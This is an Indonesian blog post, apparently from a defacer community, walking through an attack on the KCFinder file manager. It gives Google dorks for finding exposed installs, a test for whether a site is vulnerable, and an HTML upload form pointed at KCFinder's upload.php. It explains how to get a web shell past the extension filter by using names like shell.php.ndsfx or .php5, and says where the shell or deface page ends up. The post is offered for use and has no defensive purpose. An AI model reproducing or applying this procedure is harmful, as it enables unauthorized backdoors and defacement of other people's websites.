Header Ads

KCFinder Shell Upload



Google Dork : 

inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files

(selebihnya use ur briant)

Exploit :

 www.site.com/path/kcfinder/upload.php 
 

Jika tertulis ' Unknown error ' berarti itu vlun, jika bukan berarti tidak :D

Copy dan paste script CSRF di bawah, berformat html

 <form method="POST" action="http://site.com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>Hajar !</button>
</form>

Upload script deface kamu atau shell backdoor kamu...
tapi sebelum tanam shell, format harus di ganti ndsfx atau .php5 >> shell.php.ndsfx

Recomed shell [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & scriptdeface.html ]
Ext shell yg sering tidak bisa di upload =>"exe , com , msi , bat  , php , phps , phtml , php3 , php4 , cgi , pl"

Letak shell / Defpage  : www.site.com/[path]/kcfinder/upload/files/shelllu.php.ndsfx/etc

Semoga Bermanfaat

No comments

Powered by Blogger.